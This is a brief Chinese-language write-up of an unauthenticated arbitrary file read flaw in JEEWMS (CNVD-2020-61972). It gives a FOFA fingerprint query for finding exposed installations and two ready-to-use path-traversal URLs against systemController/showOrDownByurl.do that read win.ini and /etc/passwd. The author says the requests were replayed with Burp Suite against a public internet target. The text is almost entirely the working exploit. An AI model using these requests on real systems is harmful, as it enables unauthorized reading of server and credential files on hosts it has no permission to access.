JEEWMS 本地文件包含漏洞-CNVD-2020-61972

JEEWMS存在未授权任意文件读取漏洞

漏洞描述

JEEWMS存在未授权任意文件读取漏洞

漏洞影响

JEEWMS全版本

FOFA

body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" && body="仓"

 

本次在公网环境下，不对其造成网站破坏

 

 

 

第一种：http://x.x.x.x/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini

第二种：http://x.x.x.x/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd

 

本次获取pwdw文件

BurpSuit抓包，进行重放

 

 访问到该文件

End!!!